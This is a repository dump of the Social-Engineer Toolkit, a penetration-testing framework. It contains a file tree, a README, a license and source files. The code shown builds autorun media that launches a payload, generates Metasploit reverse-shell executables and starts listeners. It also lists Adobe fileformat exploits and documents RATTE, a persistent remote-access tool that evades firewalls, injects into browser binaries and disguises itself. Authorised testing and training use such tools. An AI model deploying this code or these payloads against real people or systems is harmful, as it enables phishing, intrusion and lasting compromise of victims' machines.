├── README.md ├── modules ├── ratte_module.py ├── ratte_only_module.py ├── readme.txt ├── test_module.example └── test_module.readme ├── readme ├── CHANGES ├── CREDITS ├── LICENSE ├── RATTE_README.txt └── User_Manual.pdf ├── seautomate ├── seproxy ├── setoolkit ├── setup.py ├── seupdate └── src ├── __init__.py ├── autorun ├── __init__.py └── autolaunch.py ├── core ├── __init__.py ├── arp_cache │ ├── __init__.py │ └── arp.py ├── config.baseline ├── dictionaries.py ├── fasttrack.py ├── menu │ ├── __init__.py │ └── text.py ├── module_handler.py ├── msf_attacks │ ├── __init__.py │ ├── create_payload.py │ ├── database │ │ └── msf.database │ ├── form.pdf │ └── msf_list.py ├── patched │ ├── __init__.py │ └── socket.py ├── payloadgen │ ├── __init__.py │ ├── create_payloads.py │ └── solo.py ├── payloadprep.py ├── reports │ ├── files │ │ ├── logo.png │ │ ├── main.png │ │ ├── rss.png │ │ ├── style.css │ │ └── tweet.png │ └── index.html ├── scapy.py ├── set.py ├── setcore.py ├── ssl │ ├── PoC_SSL.py │ ├── __init__.py │ └── setssl.py ├── tds.py ├── update_config.py └── webserver.py ├── dev-notes ├── TODO └── html_color.txt ├── fasttrack ├── __init__.py ├── autopwn.py ├── delldrac.py ├── exploits │ ├── __init__.py │ ├── f5.py │ ├── firefox_3_6_16.py │ ├── ms08067.py │ ├── mysql_bypass.py │ ├── rdpdos.py │ └── solarwinds.py ├── mssql.py ├── psexec.py ├── rid_enum.py ├── sccm │ ├── __init__.py │ └── sccm_main.py └── wordlist.txt ├── html ├── Signed_Update.jar.orig ├── __init__.py ├── fasttrack_http_server.py ├── spawn.py ├── templates │ ├── __init__.py │ ├── facebook │ │ └── index.template │ ├── google │ │ └── index.template │ ├── java │ │ └── index.template │ ├── template.py │ ├── twitter │ │ └── index.template │ └── yahoo │ │ └── index.template ├── unsigned │ ├── __init__.py │ ├── self_sign.py │ ├── unsigned.jar │ └── verified_sign.py └── web_start.py ├── payloads ├── __init__.py ├── exe │ ├── shellcodeexec.binary │ └── shellcodeexec.c ├── hex2binary.payload ├── powershell │ ├── __init__.py │ ├── powershell_shellcode.code │ └── prep.py ├── ratte │ ├── cygwin1.dll │ ├── ratte.binary │ ├── ratteserver │ └── ratteserver.binary └── set_payloads │ ├── __init__.py │ ├── downloader.c │ ├── downloader.posix │ ├── downloader.windows │ ├── http_shell.binary │ ├── http_shell.py │ ├── listener.py │ ├── multi_pyinjector.binary │ ├── multi_pyinjector.py │ ├── persistence.binary │ ├── persistence.py │ ├── pyinjector.binary │ ├── pyinjector_args.py │ ├── readme.txt │ ├── set_http_server.py │ ├── shell.binary │ ├── shell.linux │ ├── shell.osx │ ├── shell.py │ ├── shell.windows │ └── uac_bypass │ ├── source │ ├── CMMN.cpp │ ├── CMMN.h │ ├── Redirector.cpp │ ├── Redirector.h │ ├── TIOR │ │ ├── TIOR.cpp │ │ ├── TIOR.vcxproj │ │ ├── TIOR.vcxproj.filters │ │ ├── TIOR.vcxproj.user │ │ ├── stdafx.cpp │ │ ├── stdafx.h │ │ └── targetver.h │ ├── Win7Elevate.sln │ ├── Win7Elevate │ │ ├── Resource.h │ │ ├── Win7Elevate.cpp │ │ ├── Win7Elevate.rc │ │ ├── Win7Elevate.vcxproj │ │ ├── Win7Elevate.vcxproj.filters │ │ ├── Win7Elevate.vcxproj.user │ │ ├── Win7Elevate_Inject.cpp │ │ ├── Win7Elevate_Inject.h │ │ ├── Win7Elevate_Utils.cpp │ │ ├── Win7Elevate_Utils.h │ │ ├── stdafx.cpp │ │ ├── stdafx.h │ │ └── targetver.h │ ├── Win7ElevateDll │ │ ├── Win7ElevateDll.cpp │ │ ├── Win7ElevateDll.vcxproj │ │ ├── Win7ElevateDll.vcxproj.filters │ │ ├── Win7ElevateDll.vcxproj.user │ │ ├── dllmain.cpp │ │ ├── stdafx.cpp │ │ ├── stdafx.h │ │ └── targetver.h │ ├── stdafx.h │ └── targetver.h │ ├── x64.binary │ └── x86.binary ├── phishing ├── __init__.py └── smtp │ ├── __init__.py │ └── client │ ├── __init__.py │ ├── custom_template.py │ ├── smtp_client.py │ └── smtp_web.py ├── powershell ├── __init__.py ├── bind.powershell ├── powerdump.encoded ├── powerdump.powershell ├── powershell.py ├── reverse.powershell ├── shellcode_injection.powershell └── shellcode_injection_expanded.powershell ├── qrcode ├── __init__.py ├── qrcode.py └── qrgenerator.py ├── teensy ├── __init__.py ├── beef.pde ├── binary2teensy.py ├── gnome_wget.pde ├── java_applet.pde ├── osx_sd2teensy.pde ├── peensy.pde ├── powershell_down.pde ├── powershell_reverse.pde ├── powershell_shellcode.py ├── sd2teensy.py ├── teensy.py ├── wscript.pde └── x10 │ ├── libraries.zip │ ├── x10_blackout.pde │ └── x10_sniffer.pde ├── templates ├── 31328256862518006364.template ├── 4842870413984355770.template ├── 84863010888203269076.template ├── baby.template ├── ebook.template ├── newupdate.template ├── receipt.template ├── report.template ├── sms │ ├── 12161896267335046246.template │ ├── 16596172621284277248.template │ ├── 18563883160952176830.template │ ├── 27973430829013746123.template │ ├── 34070789312210934380.template │ ├── 43234513006619301607.template │ ├── 45723463533772650533.template │ ├── 48842587427349852379.template │ ├── 51366883259558865424.template │ ├── 5366255995038334754.template │ ├── 61235614880419094815.template │ ├── 65225885161440001690.template │ ├── 71056159094763737298.template │ ├── 81470651031833477694.template │ ├── 89232956998478665492.template │ ├── 93752647864031571599.template │ ├── 98099561929676707961.template │ ├── fake_boss.template │ ├── fake_police.template │ └── fool_vodafone.template ├── status.template └── strange.template ├── webattack ├── __init__.py ├── browser_exploits │ ├── __init__.py │ └── gen_payload.py ├── dll_hijacking │ ├── __init__.py │ ├── hijacking.c │ ├── hijacking.c.wscript │ ├── hijacking.dll │ ├── hijacking.dll.wscript │ ├── hijacking.py │ └── repository ├── fsattack │ ├── FACEBOOK │ │ ├── css │ │ │ ├── facebox.css │ │ │ └── style.css │ │ ├── img │ │ │ ├── browser-linux-chrome-bg.png │ │ │ ├── browser-linux-chrome-left.png │ │ │ ├── browser-linux-chrome-right.png │ │ │ ├── browser-linux-firefox-bg.png │ │ │ ├── browser-linux-firefox-left.png │ │ │ ├── browser-linux-firefox-right.png │ │ │ ├── browser-osx-chrome-bg.png │ │ │ ├── browser-osx-chrome-left.png │ │ │ ├── browser-osx-chrome-right.png │ │ │ ├── browser-osx-firefox-bg.png │ │ │ ├── browser-osx-firefox-center.png │ │ │ ├── browser-osx-firefox-left.png │ │ │ ├── browser-osx-firefox-right.png │ │ │ ├── browser-osx-safari-bg.png │ │ │ ├── browser-osx-safari-center.png │ │ │ ├── browser-osx-safari-left.png │ │ │ ├── browser-osx-safari-right.png │ │ │ ├── browser-windows-chrome-bg.png │ │ │ ├── browser-windows-chrome-left.png │ │ │ ├── browser-windows-chrome-right.png │ │ │ ├── browser-windows-firefox-bg.png │ │ │ ├── browser-windows-firefox-left.png │ │ │ ├── browser-windows-firefox-right.png │ │ │ ├── facebox │ │ │ │ ├── closelabel.png │ │ │ │ └── loading.gif │ │ │ ├── fb.png │ │ │ ├── flogin.png │ │ │ ├── menu-osx-bg.png │ │ │ ├── menu-osx-chrome-left.png │ │ │ ├── menu-osx-firefox-left.png │ │ │ ├── menu-osx-right.png │ │ │ └── menu-osx-safari-left.png │ │ └── js │ │ │ ├── libs │ │ │ ├── browser-detect.js │ │ │ ├── facebox.js │ │ │ ├── fullscreen-api-shim.js │ │ │ ├── jquery-1.7.2.js │ │ │ └── jquery-ui-1.8.18.custom.min.js │ │ │ ├── plugins.js │ │ │ └── script.js │ ├── GMAIL │ │ ├── css │ │ │ ├── facebox.css │ │ │ └── style.css │ │ ├── img │ │ │ ├── browser-linux-chrome-bg.png │ │ │ ├── browser-linux-chrome-left.png │ │ │ ├── browser-linux-chrome-right.png │ │ │ ├── browser-linux-firefox-bg.png │ │ │ ├── browser-linux-firefox-left.png │ │ │ ├── browser-linux-firefox-right.png │ │ │ ├── browser-osx-chrome-bg.png │ │ │ ├── browser-osx-chrome-left.png │ │ │ ├── browser-osx-chrome-right.png │ │ │ ├── browser-osx-firefox-bg.png │ │ │ ├── browser-osx-firefox-center.png │ │ │ ├── browser-osx-firefox-left.png │ │ │ ├── browser-osx-firefox-right.png │ │ │ ├── browser-osx-safari-bg.png │ │ │ ├── browser-osx-safari-center.png │ │ │ ├── browser-osx-safari-left.png │ │ │ ├── browser-osx-safari-right.png │ │ │ ├── browser-windows-chrome-bg.png │ │ │ ├── browser-windows-chrome-left.png │ │ │ ├── browser-windows-chrome-right.png │ │ │ ├── browser-windows-firefox-bg.png │ │ │ ├── browser-windows-firefox-left.png │ │ │ ├── browser-windows-firefox-right.png │ │ │ ├── facebox │ │ │ │ ├── closelabel.png │ │ │ │ └── loading.gif │ │ │ ├── glogin.png │ │ │ ├── gmail.png │ │ │ ├── lgmail.png │ │ │ ├── menu-osx-bg.png │ │ │ ├── menu-osx-chrome-left.png │ │ │ ├── menu-osx-firefox-left.png │ │ │ ├── menu-osx-right.png │ │ │ └── menu-osx-safari-left.png │ │ └── js │ │ │ ├── libs │ │ │ ├── browser-detect.js │ │ │ ├── facebox.js │ │ │ ├── fullscreen-api-shim.js │ │ │ ├── jquery-1.7.2.js │ │ │ └── jquery-ui-1.8.18.custom.min.js │ │ │ ├── plugins.js │ │ │ └── script.js │ ├── __init__.py │ ├── fsattacks.py │ ├── full.py │ └── readme ├── harvester │ ├── __init__.py │ ├── harvester.py │ ├── report_generator.py │ └── scraper.py ├── hta │ ├── __init__.py │ └── main.py ├── java_applet │ ├── Java.java │ ├── manifest.mf │ ├── sign.sh │ ├── sign_jar.py │ └── unsigned.py ├── mlitm │ ├── __init__.py │ └── thebiz.py ├── multi_attack │ ├── __init__.py │ └── multiattack.py ├── profiler │ ├── __init__.py │ └── webprofiler.py ├── tabnabbing │ ├── __init__.py │ ├── source.js │ └── tabnabbing.py └── web_clone │ ├── __init__.py │ ├── applet.database │ ├── applet.database.old │ ├── applet.txt │ ├── cloner.py │ ├── repeater.database │ └── unc.database └── wireless ├── __init__.py ├── airbase-ng ├── airmon-ng ├── stop_wifiattack.py └── wifiattack.py /README.md: -------------------------------------------------------------------------------- 1 | #The Social-Engineer Toolkit (SET) 2 | Copyright 2015 The Social-Engineer Toolkit (SET) 3 | 4 | Written by: David Kennedy (ReL1K) 5 | 6 | Company: [TrustedSec](https://www.trustedsec.com) 7 | 8 | DISCLAIMER: This is only for testing purposes and can only be used where strict consent has been given. Do not use this for illegal purposes, period. 9 | 10 | Please read the LICENSE under readme/LICENSE for the licensing of SET. 11 | 12 | #Features 13 | 14 | The Social-Engineer Toolkit is an open-source penetration testing framework designed for social engineering. SET has a number of custom attack vectors that allow you to make a believable attack quickly. SET is a product of TrustedSec, LLC – an information security consulting firm located in Cleveland, Ohio. 15 | 16 | ### Bugs and enhancements 17 | 18 | For bug reports or enhancements, please open an issue here: https://github.com/trustedsec/social-engineer-toolkit/issues 19 | 20 | ### Supported platforms 21 | 22 | * Linux 23 | * Windows (experimental) 24 | * Mac OS X (partial) 25 | -------------------------------------------------------------------------------- /modules/readme.txt: -------------------------------------------------------------------------------- 1 | This is a new section to add your own modules, you can use function calls like: 2 | 3 | Read the readme/User_Manual.pdf on how to create your own SET modules. 4 | 5 | -------------------------------------------------------------------------------- /modules/test_module.example: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | # These are required fields 4 | from src.core.setcore import * 5 | import sys 6 | 7 | MAIN = " This is a test module" 8 | AUTHOR = " Dave - TrustedSec" 9 | 10 | # def main(): header is required 11 | def main(): 12 | java_applet_attack("https://gmail.com","443","reports/") 13 | pause=raw_input(" This module has finished completing. Press to continue") 14 | -------------------------------------------------------------------------------- /modules/test_module.readme: -------------------------------------------------------------------------------- 1 | # 2 | # These are required fields 3 | # 4 | from src.core.setcore import * 5 | import sys 6 | 7 | MAIN="This is a test module" 8 | AUTHOR="Dave - TrustedSec" 9 | 10 | # def main(): header is required 11 | def main(): 12 | java_applet_attack("https://gmail.com","443","reports/") 13 | pause=raw_input("This module has finished completing. Press to continue") 14 | -------------------------------------------------------------------------------- /readme/LICENSE: -------------------------------------------------------------------------------- 1 | 2 | Copyright 2015, The Social-Engineer Toolkit (SET) by TrustedSec, LLC 3 | All rights reserved. 4 | 5 | Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: 6 | 7 | * Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. 8 | * Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. 9 | * Neither the name of Social-Engineer Toolkit nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission. 10 | 11 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 12 | 13 | The above licensing was taken from the BSD licensing and is applied to Social-Engineer Toolkit as well. 14 | 15 | Note that the Social-Engineer Toolkit is provided as is, and is a royalty free open-source application. 16 | 17 | Feel free to modify, use, change, market, do whatever you want with it as long as you give the appropriate credit where credit is due (which means giving the authors the credit they deserve for writing it). Also note that by using this software, if you ever see the creator of SET in a bar, you should give him a hug and buy him a beer. Hug must last at least 5 seconds. Author holds the right to refuse the hug (most likely will never happen) or the beer (also most likely will never happen). 18 | -------------------------------------------------------------------------------- /readme/RATTE_README.txt: -------------------------------------------------------------------------------- 1 | RATTE (Remote Administration Tool Tommy Edition) is a payload and third party module added/created to SET by 2 | Thomas Werth. 3 | 4 | A couple of things to note about RATTE is that it's main purpose and design is to completely evade egress and firewall based restrictions by leveraging purely HTTP communications for the commands back and forth. 5 | RATTE has been extend to be very customizeable. 6 | For now you can set: 7 | - Connect Back IP 8 | - Connect Back Port 9 | - Wheater RATTE is persistent or not (example: For network Firewall testing, there is no need for beeing persistent. In a penetration test things may look different) 10 | - a custom filename which RATTE uses for running so local firewalls and user may be fooled using names like iexplore.exe or firefox.exe and on ... 11 | 12 | If RATTE is persistent, it tries on NTFS Systems to inject itself into Default Browser file binary and replaces 13 | the executables with a portion of its own code in it as well. If this fails RATTE will save itself as autorun app using custom filename specified. If this one is missing it will go as iexplore.exe. 14 | 15 | RATTE relies on communications to microsoft.com to identify the path out of the network. 16 | -------------------------------------------------------------------------------- /readme/User_Manual.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/readme/User_Manual.pdf -------------------------------------------------------------------------------- /seproxy: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | # 4 | # Simple proxy for SET, note will show up in history 5 | # 6 | 7 | import pexpect 8 | import sys 9 | import getpass 10 | 11 | from src.core.setcore import * 12 | 13 | # grab the operating system 14 | operating_system = check_os() 15 | 16 | # if windows then do some stuff 17 | if operating_system == "posix": 18 | 19 | definepath = os.getcwd() 20 | 21 | print "\n[*] Welcome to the SET-Proxy Configuration Utility" 22 | print "\nEnter the proxy setting informatiom below.\n\nExample: http://10.3.1.1:8080\n" 23 | 24 | try: 25 | 26 | proxy = raw_input("Enter the proxy server: ") 27 | username = raw_input("Enter the username for the proxy (hit enter for none): ") 28 | password = getpass.getpass("Enter the password for the proxy (hit enter for none): ") 29 | 30 | except KeyboardInterrupt: 31 | print "\n[!] Exiting the Social-Engineer Toolkit." 32 | sys.exit() 33 | 34 | if username != "": 35 | proxy_string = "export http_proxy='http://%s:%s@%s'" % (username,password,proxy) 36 | 37 | if username == "": 38 | proxy_string = "export http_proxy='http://%s'" % (proxy) 39 | 40 | filewrite = file(setdir + "/proxy.config", "w") 41 | filewrite.write(proxy_string) 42 | filewrite.close() 43 | 44 | from src.core.set import * 45 | 46 | def kill_proc(port,flag): 47 | proc=subprocess.Popen("netstat -antp | grep '%s'" % (port), shell=True, stdout=subprocess.PIPE) 48 | stdout_value=proc.communicate()[0] 49 | a=re.search("\d+/%s" % (flag), stdout_value) 50 | if a: 51 | b=a.group() 52 | b=b.replace("/%s" % (flag),"") 53 | subprocess.Popen("kill -9 %s 1> /dev/null 2> /dev/null" % (b), shell=True).wait() 54 | 55 | # cleans up stale processes from SET 56 | try: 57 | # kill anything python running on 80 58 | kill_proc("80","python") 59 | # kill anything on 443 ruby which is generally a rogue listener 60 | kill_proc("443", "ruby") 61 | 62 | # handle errors 63 | except Exception, error: 64 | log(error) 65 | pass 66 | else: 67 | print "[!] Sorry, this only works on posix (nix) based systems and is not compatible with this operating system." 68 | -------------------------------------------------------------------------------- /seupdate: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # 3 | # simple svn update for set pulling from core modules 4 | # 5 | import os 6 | import sys 7 | 8 | # check where we are and load default directory 9 | if os.path.isdir("/usr/share/setoolkit"): 10 | if not os.path.isfile("se-toolkit"): 11 | os.chdir("/usr/share/setoolkit") 12 | sys.path.append("/usr/share/setoolkit") 13 | 14 | # if we can't see our config then something didn't go good.. 15 | if not os.path.isfile("/etc/setoolkit/set.config"): 16 | print_error("Cannot locate SET executable. Try running from the local directory.") 17 | print_error("If this does not work, please run the setup.py install file.") 18 | sys.exit() 19 | 20 | from src.core.setcore import * 21 | 22 | try: 23 | # pull update set from the core libraries 24 | update_set() 25 | 26 | # except keyboard interrupts 27 | except KeyboardInterrupt: 28 | print "\n[!] Control-C detected. Exiting updating SET." 29 | 30 | # handle all other errors 31 | except Exception, e: print "\n[!] Something went wrong.. Printing the error: " + e 32 | -------------------------------------------------------------------------------- /src/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/__init__.py -------------------------------------------------------------------------------- /src/autorun/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/autorun/__init__.py -------------------------------------------------------------------------------- /src/autorun/autolaunch.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # simple autorun creation for set 3 | 4 | import subprocess 5 | import os 6 | import re 7 | import sys 8 | from src.core.setcore import * 9 | from time import sleep 10 | 11 | # define metasploit path 12 | definepath = os.getcwd() 13 | msf_path = meta_path() 14 | me = mod_name() 15 | 16 | trigger = 0 17 | if check_options("INFECTION_MEDIA=") == "ON": 18 | #if os.path.isfile(setdir + "/standardpayload.file"): 19 | trigger = 1 20 | subprocess.Popen("rm -rf %s/autorun/ 1> /dev/null 2> /dev/null;mkdir %s/autorun 1> /dev/null 2> /dev/null;cp %s/payload.exe %s/autorun/program.exe 1> /dev/null 2> /dev/null" % (setdir,setdir,setdir,setdir), shell=True).wait() 21 | 22 | if os.path.isfile(setdir + "/fileformat.file"): 23 | trigger = 2 24 | subprocess.Popen("rm -rf %s/autorun/ 1> /dev/null 2> /dev/null;mkdir autorun 1> /dev/null 2> /dev/null;cp %s/template.pdf autorun/ 1> /dev/null 2>/dev/null" % (setdir,setdir), shell=True).wait() 25 | 26 | if os.path.isfile(setdir + "/dll/openthis.wab"): 27 | subprocess.Popen("rm -rf %s/autorun/ 1> /dev/null 2> /dev/null;mkdir autorun 1> /dev/null 2> /dev/null;cp %s/dll/* autorun/ 1> /dev/null 2> /dev/null" % (setdir,setdir), shell=True).wait() 28 | trigger = 3 29 | 30 | if not os.path.isdir(setdir + "/autorun"): os.makedirs (setdir + "/autorun/") 31 | filewrite = file(setdir + "/autorun/autorun.inf", "w") 32 | 33 | # if using standard payloads 34 | if trigger == 1: 35 | payload = "program.exe" #"" + alpha_data + "\"" 36 | 37 | # if using pdf payload 38 | if trigger == 2: 39 | payload = "template.pdf" 40 | 41 | if trigger == 3: 42 | payload = "openthis.wab" 43 | 44 | filewrite.write("""[autorun] 45 | open=%s 46 | icon=autorun.ico""" % (payload)) 47 | filewrite.close() 48 | print_status("Your attack has been created in the SET home directory (/root/.set/) folder 'autorun'") 49 | print_status("Note a backup copy of template.pdf is also in /root/.set/template.pdf if needed.") 50 | print_info("Copy the contents of the folder to a CD/DVD/USB to autorun") 51 | 52 | # if we want to launch payload and automatically create listener 53 | if trigger == 1 or trigger == 2 or trigger == 3: 54 | choice1 = yesno_prompt("0", "Create a listener right now [yes|no]") 55 | if choice1.lower() == "yes" or choice1.lower() == "y": 56 | # if we used something to create other than solo.py then write out the listener 57 | if not os.path.isfile(setdir + "/meta_config"): 58 | filewrite = file(setdir + "/meta_config", "w") 59 | fileopen = file(setdir + "/payload.options", "r") 60 | for line in fileopen: 61 | line = line.split(" ") 62 | filewrite.write("use multi/handler\n") 63 | filewrite.write("set payload " + line[0] + "\n") 64 | filewrite.write("set lhost " + line[1] + "\n") 65 | filewrite.write("set lport " + line[2] + "\n") 66 | filewrite.write("set ExitOnSession false\n") 67 | filewrite.write("exploit -j\r\n\r\n") 68 | filewrite.close() 69 | 70 | # create the listener 71 | print_status("Launching Metasploit.. This could take a few. Be patient! Or else no shells for you..") 72 | subprocess.Popen("%smsfconsole -r %s/meta_config" % (msf_path, setdir), shell=True).wait() 73 | else: 74 | print_warning("cancelling...") 75 | sleep (2) 76 | -------------------------------------------------------------------------------- /src/core/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/core/__init__.py -------------------------------------------------------------------------------- /src/core/arp_cache/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/core/arp_cache/__init__.py -------------------------------------------------------------------------------- /src/core/menu/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/core/menu/__init__.py -------------------------------------------------------------------------------- /src/core/module_handler.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | ## module_handler.py 4 | 5 | import glob 6 | import re 7 | import sys 8 | from src.core.setcore import * 9 | 10 | # this is just if the user wants to return to menu 11 | menu_return = "false" 12 | 13 | # base counter to identify numbers 14 | counter = 0 15 | 16 | # get the menu going 17 | print "\n" 18 | print_info_spaces("Social-Engineer Toolkit Third Party Modules menu.") 19 | print_info_spaces("Please read the readme/modules.txt for information on how to create your own modules.\n") 20 | 21 | for name in glob.glob("modules/*.py"): 22 | 23 | counter = counter + 1 24 | fileopen = file(name, "r") 25 | 26 | for line in fileopen: 27 | line = line.rstrip() 28 | match = re.search("MAIN=", line) 29 | if match: 30 | line = line.replace('MAIN="', "") 31 | line = line.replace('"', "") 32 | line = " " + str(counter) + ". " + line 33 | print line 34 | 35 | print "\n 99. Return to the previous menu\n" 36 | choice = raw_input(setprompt(["9"], "")) 37 | 38 | if choice == 'exit': 39 | exit_set() 40 | 41 | if choice == '99': 42 | menu_return = "true" 43 | 44 | # throw error if not integer 45 | try: 46 | choice = int(choice) 47 | except: 48 | print_warning("An integer was not used try again") 49 | choice = raw_input(setprompt(["9"], "")) 50 | 51 | # start a new counter to match choice 52 | counter = 0 53 | 54 | if menu_return == "false": 55 | # pull any files in the modules directory that starts with .py 56 | for name in glob.glob("modules/*.py"): 57 | 58 | counter = counter+1 59 | 60 | if counter == int(choice): 61 | # get rid of .modules extension 62 | name = name.replace("modules/", "") 63 | # get rid of .py extension 64 | name = name.replace(".py", "") 65 | # changes our system path to modules so we can import the files 66 | sys.path.append("modules/") 67 | # this will import the third party module 68 | 69 | try: 70 | exec("import " + name) 71 | except: 72 | pass 73 | 74 | # this will call the main() function inside the python file 75 | # if it doesn't exist it will still continue just throw a warning 76 | try: 77 | exec("%s.main()" % (name)) 78 | # handle the exception if main isn't there 79 | except Exception, e: 80 | raw_input(" [!] There was an issue with a module: %s." % (e)) 81 | return_continue() 82 | -------------------------------------------------------------------------------- /src/core/msf_attacks/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/core/msf_attacks/__init__.py -------------------------------------------------------------------------------- /src/core/msf_attacks/database/msf.database: -------------------------------------------------------------------------------- 1 | exploit/windows/fileformat/adobe_collectemailinfo Adobe Collab.collectEmailInfo() Buffer Overflow 2 | exploit/windows/fileformat/adobe_geticon Adobe Collab.getIcon() Buffer Overflow 3 | exploit/windows/fileformat/adobe_jbig2decode Adobe JBIG2Decode Memory Corruption Exploit 4 | exploit/windows/fileformat/adobe_pdf_embedded_exe Adobe PDF Embedded EXE Social Engineering 5 | exploit/windows/fileformat/adobe_utilprintf Adobe util.printf() Buffer Overflow 6 | exploit/windows/fileformat/adobe_u3d_meshdecl Adobe U3D CLODProgressiveMeshDeclaration Array Overrun 7 | exploit/windows/fileformat/adobe_flatedecode_predictor02 Adobe FlateDecode Stream Predictor 02 Integer Overflow 8 | exploit/windows/fileformat/adobe_media_newplayer Adobe Doc.media.newPlayer Use After Free Vulnerability 9 | 10 | -------------------------------------------------------------------------------- /src/core/msf_attacks/form.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/core/msf_attacks/form.pdf -------------------------------------------------------------------------------- /src/core/msf_attacks/msf_list.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | from src.core.setcore import debug_msg, mod_name 3 | import subprocess 4 | import re 5 | import sys 6 | 7 | me = mod_name() 8 | 9 | sys.path.append("src/core") 10 | debug_msg(me,"re-importing 'src.core.setcore'",1) 11 | try: reload(setcore) 12 | except: import setcore 13 | print "[---] Updating the Social Engineer Toolkit FileFormat Exploit List [---]" 14 | generate_list=subprocess.Popen("%s/msfcli | grep fileformat > src/core/msf_attacks/database/msf.database" % (meta_path), shell=True).wait() 15 | print "[---] Database is now up-to-date [---]" 16 | -------------------------------------------------------------------------------- /src/core/patched/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/core/patched/__init__.py -------------------------------------------------------------------------------- /src/core/payloadgen/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/core/payloadgen/__init__.py -------------------------------------------------------------------------------- /src/core/payloadgen/solo.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import subprocess 3 | from src.core.setcore import * 4 | from src.core.menu.text import * 5 | from src.core.dictionaries import * 6 | 7 | # definepath 8 | definepath=os.getcwd() 9 | sys.path.append(definepath) 10 | # grab the metasploit path 11 | meta_path = meta_path() 12 | 13 | # here we handle our main payload generation 14 | def payload_generate(payload, lhost, port): 15 | # generate metasploit 16 | subprocess.Popen(meta_path + "msfvenom -p %s LHOST=%s LPORT=%s --format=exe > %s/payload.exe" % (payload,lhost,port,setdir), stderr=subprocess.PIPE, stdout=subprocess.PIPE, shell=True).wait() 17 | # write out the rc file 18 | filewrite = file(setdir + "/meta_config", "w") 19 | filewrite.write("use multi/handler\nset payload %s\nset LHOST %s\nset LPORT %s\nset ExitOnSession false\nexploit -j\r\n\r\n" % (payload,lhost,port)) 20 | filewrite.close() 21 | print_status("Payload has been exported to the default SET directory located under: " + setdir + "/payload.exe") 22 | 23 | show_payload_menu2 = create_menu(payload_menu_2_text, payload_menu_2) 24 | payload=(raw_input(setprompt(["4"], ""))) 25 | # if its default then select meterpreter 26 | if payload == "" : payload="2" 27 | # assign the right payload 28 | payload=ms_payload(payload) 29 | lhost=raw_input(setprompt(["4"], "IP address for the payload listener (LHOST)")) 30 | port = raw_input(setprompt(["4"], "Enter the PORT for the reverse listener")) 31 | # print to user that payload is being generated 32 | print_status("Generating the payload.. please be patient.") 33 | # generate the actual payload 34 | payload_generate(payload,lhost,port) 35 | 36 | # check options to see if we are using the infectious media generator 37 | if check_options("INFECTION_MEDIA=") != "ON": 38 | # start the payload for the user 39 | payload_query = raw_input(setprompt(["4"], "Do you want to start the payload and listener now? (yes/no)")) 40 | if payload_query.lower() == "y" or payload_query.lower() == "yes": 41 | print_status("Launching msfconsole, this could take a few to load. Be patient...") 42 | subprocess.Popen(meta_path + "msfconsole -r " + setdir + "/meta_config", shell=True).wait() 43 | 